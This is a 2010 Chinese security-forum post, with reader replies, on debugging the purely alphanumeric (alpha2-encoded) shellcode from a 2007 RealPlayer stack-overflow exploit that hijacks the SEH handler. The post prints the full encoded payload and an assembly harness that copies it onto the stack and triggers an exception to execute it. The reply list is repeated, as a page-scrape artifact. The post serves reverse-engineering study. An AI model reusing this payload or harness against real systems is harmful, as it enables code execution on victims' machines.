[原创+整理]经典案例中的纯字符shellcode调试——07年Realplayer漏洞Exploit-软件逆向-看雪-安全社区|安全招聘|kanxue.com

[原创+整理]经典案例中的纯字符shellcode调试——07年Realplayer漏洞Exploit

发表于: 2010-5-18 06:37 14747

[原创+整理]经典案例中的纯字符shellcode调试——07年Realplayer漏洞Exploit

轩辕小聪

2010-5-18 06:37

14747

看到snowdbg刚刚的一篇精华文章http://bbs.pediy.com/showthread.php?t=113177谈到了纯字符型shellcode的加解密问题，其中achillis道出了关键：

于是我想起了07年的Realplayer漏洞的纯字符shellcode，这正是用那样的引擎产生出来的，一个连解码部分都是纯字母数字的shellcode。那时我对shellcode调试还并不了解，刚刚尝试接触这个方面的知识就第一次碰到了纯字符shellcode，因此印象深刻。当时我只能通过查找alpha2的解密代码，用解密代码来把shellcode解出来，而不是通过调试shellcode中的解密代码的方式。后来看到了有关漏洞原理和触发的全过程的分析文章，才通过调试shellcode中的解密代码的方式把它解密出来，个人觉得那个解密代码的确写得非常有心思。现在恰逢其会，就整一篇小文在这里说一下跟大家分享。

该漏洞的原理请参考
[1]http://bbs.pediy.com/showthread.php?t=55357
该漏洞的触发过程及如何跳入shellcode的过程，参考
[2]http://www.sinoit.org.cn/NewsLetter/NO.11/1104.html

从以上两篇文章可以看到，该漏洞的利用是通过触发栈溢出并覆盖SEH处理例程地址来实现的，其中以下段落指出的编写Exploit的关键：

.386 
.model flat,stdcall 
option casemap:none

.data
payload	dd	04740675h, 41414141h
	db	'LLLL\XXXXXLD'
	db	'TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIxkR0q'
	db	'JPJP3YY0fNYwLEQk0p47zpfKRKJJKVe9xJKYoIoYolOoCQv3VsVwLuRKwRvavbFQvJMWVsZzMFv0'
	db	'z8K8mwVPnxmmn8mDUBzJMEBsHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGON'
	db	'uKpTRrNWOVYM5mqqrwSMTnoeoty08JMnKJMgPw2pey5MgMWQuMwrunOgp8mpn8m7PrZBEleoWng2'
	db	'DRELgZMU6REoUJMmLHmz1KUOPCXHmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOL'
	db	'NQKe6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI5alJMqqrauWJUWrhS3OQW'
	db	'RU5QrENVcE61vPUOVtvTv4uP0DvLYfQOjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp'
	db	'5oinTWLgOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5PfEqTCuBgEGoDUtR4'
	db	'CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcENeStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS'
	db	'4DTww6tuOUw2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwWqvRHptd4RPFZV'
	db	'OdoRWQgrWTnQw2Y3JT96NPod2pgToPgrY0z2YTnSUQhU5k0wpA',0

.code
Start:
	push	esi
	push	edi
	push	ebx
	sub	esp, 400h
	call	reloc
reloc:	
	pop	ebx
	mov	esi, offset payload
	mov	edi, esi
	xor	eax, eax
	or	ecx, 0FFFFFFFFh
	xor	eax, eax
	repne	scasb
	not	ecx
	dec	ecx
	mov	edi, esp
	rep	movsb
	assume	fs:nothing
	mov	fs:[0], esp
	add	ebx, sehhandle-reloc
	mov	[esp+4], ebx
	xor	eax, eax
	mov	dword ptr [eax], 0
	pop	ebx
sehhandle:
	pop	edi
	pop	esi
	ret	

end Start

登录后可查看完整内容

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

#调试逆向

上传的附件：

RealplayerShellcode.rar （3.17kb，129次下载）

收藏・18

免费・7

支持

最新回复 (11)
achillis 雪币： 7651 活跃值： (523) 能力值： ( LV9，RANK：610 ) 在线值：发帖 32 回帖 2032 粉丝 47 关注私信	achillis 15 2 楼 “带着镣铐跳舞”这个比喻很形象啊~ 2010-5-18 07:06 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 3 楼好文章，看完再说。。。 2010-5-18 09:18 0
snowdbg 雪币： 3171 活跃值： (76) 能力值： (RANK：250 ) 在线值：发帖 13 回帖 129 粉丝 2 关注私信	snowdbg 6 4 楼还是小聪分析的透彻啊~~ 共同进步-- 你起的好早不知道小聪兄弟对by pass DEP， ASLR等有没有深入研究，我最近正在看这方面的东西可以交流~~ 2010-5-18 11:12 0
天易love 雪币： 2015 活跃值： (902) 能力值： ( LV12，RANK：1000 ) 在线值：发帖 106 回帖 1059 粉丝 21 关注私信	天易love 18 5 楼还是研究漏洞有意思，有共同语言，必须得向前辈虚心学习!浏览过一些漏洞分析的文章，很多都是解析文件格式时出的问题，或者不同类型变量赋值导致字符串复制时参数变大发生溢出或者给驱动传了个函数指针且被运行了。感觉搞这个比较实在，有成就感，要加强学习了。 2010-5-18 13:00 0
zhuliang 雪币： 1098 活跃值： (193) 能力值： (RANK：210 ) 在线值：发帖 36 回帖 401 粉丝 15 关注私信	zhuliang 5 6 楼支持，编码是为了防检测，有时还会看到利用端口复用以过FW的。 2010-5-20 09:00 0
dge 雪币： 622 活跃值： (65) 能力值： ( LV13，RANK：290 ) 在线值：发帖 11 回帖 251 粉丝 3 关注私信	dge 6 7 楼这种显然不是为了防检测，当然也有效，但那不是重点，重点是为了绕过漏洞场景中对字符串的限制。 2010-5-20 13:02 0
依然随意雪币： 111 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 13 粉丝 0 关注私信	依然随意 8 楼万一输入要求是Unicode，溢出点也是Unicode咋办？又没有纯Unicode的shellcode呢？ 2010-5-20 21:18 0
dge 雪币： 622 活跃值： (65) 能力值： ( LV13，RANK：290 ) 在线值：发帖 11 回帖 251 粉丝 3 关注私信	dge 6 9 楼在文件格式中绝大部分是你说的这种情况，就是并不会转换回来，直接执行unicode shellcode。大部分纯字符shellcode都是为你说的这种情况而编写的。 2010-5-20 23:37 0
itf 雪币： 1681 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 127 粉丝 0 关注私信	itf 10 楼学习下谢谢了~~~有问题向你问下啊 2010-5-21 00:11 0
jiangming 雪币： 57 活跃值： (55) 能力值： ( LV3，RANK：20 ) 在线值：发帖 24 回帖 135 粉丝 0 关注私信	jiangming 11 楼你太猛了…… 2010-11-26 00:25 0
webwizard 雪币： 29 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 310 粉丝 0 关注私信	webwizard 12 楼一直对SEH和漏洞模模糊糊。赶紧学习！ 2010-11-26 03:24 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

轩辕小聪

发帖

547

回帖

300

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (11)
achillis 雪币： 7651 活跃值： (523) 能力值： ( LV9，RANK：610 ) 在线值：发帖 32 回帖 2032 粉丝 47 关注私信	achillis 15 2 楼 “带着镣铐跳舞”这个比喻很形象啊~ 2010-5-18 07:06 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 3 楼好文章，看完再说。。。 2010-5-18 09:18 0
snowdbg 雪币： 3171 活跃值： (76) 能力值： (RANK：250 ) 在线值：发帖 13 回帖 129 粉丝 2 关注私信	snowdbg 6 4 楼还是小聪分析的透彻啊~~ 共同进步-- 你起的好早不知道小聪兄弟对by pass DEP， ASLR等有没有深入研究，我最近正在看这方面的东西可以交流~~ 2010-5-18 11:12 0
天易love 雪币： 2015 活跃值： (902) 能力值： ( LV12，RANK：1000 ) 在线值：发帖 106 回帖 1059 粉丝 21 关注私信	天易love 18 5 楼还是研究漏洞有意思，有共同语言，必须得向前辈虚心学习!浏览过一些漏洞分析的文章，很多都是解析文件格式时出的问题，或者不同类型变量赋值导致字符串复制时参数变大发生溢出或者给驱动传了个函数指针且被运行了。感觉搞这个比较实在，有成就感，要加强学习了。 2010-5-18 13:00 0
zhuliang 雪币： 1098 活跃值： (193) 能力值： (RANK：210 ) 在线值：发帖 36 回帖 401 粉丝 15 关注私信	zhuliang 5 6 楼支持，编码是为了防检测，有时还会看到利用端口复用以过FW的。 2010-5-20 09:00 0
dge 雪币： 622 活跃值： (65) 能力值： ( LV13，RANK：290 ) 在线值：发帖 11 回帖 251 粉丝 3 关注私信	dge 6 7 楼这种显然不是为了防检测，当然也有效，但那不是重点，重点是为了绕过漏洞场景中对字符串的限制。 2010-5-20 13:02 0
依然随意雪币： 111 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 13 粉丝 0 关注私信	依然随意 8 楼万一输入要求是Unicode，溢出点也是Unicode咋办？又没有纯Unicode的shellcode呢？ 2010-5-20 21:18 0
dge 雪币： 622 活跃值： (65) 能力值： ( LV13，RANK：290 ) 在线值：发帖 11 回帖 251 粉丝 3 关注私信	dge 6 9 楼在文件格式中绝大部分是你说的这种情况，就是并不会转换回来，直接执行unicode shellcode。大部分纯字符shellcode都是为你说的这种情况而编写的。 2010-5-20 23:37 0
itf 雪币： 1681 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 127 粉丝 0 关注私信	itf 10 楼学习下谢谢了~~~有问题向你问下啊 2010-5-21 00:11 0
jiangming 雪币： 57 活跃值： (55) 能力值： ( LV3，RANK：20 ) 在线值：发帖 24 回帖 135 粉丝 0 关注私信	jiangming 11 楼你太猛了…… 2010-11-26 00:25 0
webwizard 雪币： 29 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 310 粉丝 0 关注私信	webwizard 12 楼一直对SEH和漏洞模模糊糊。赶紧学习！ 2010-11-26 03:24 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复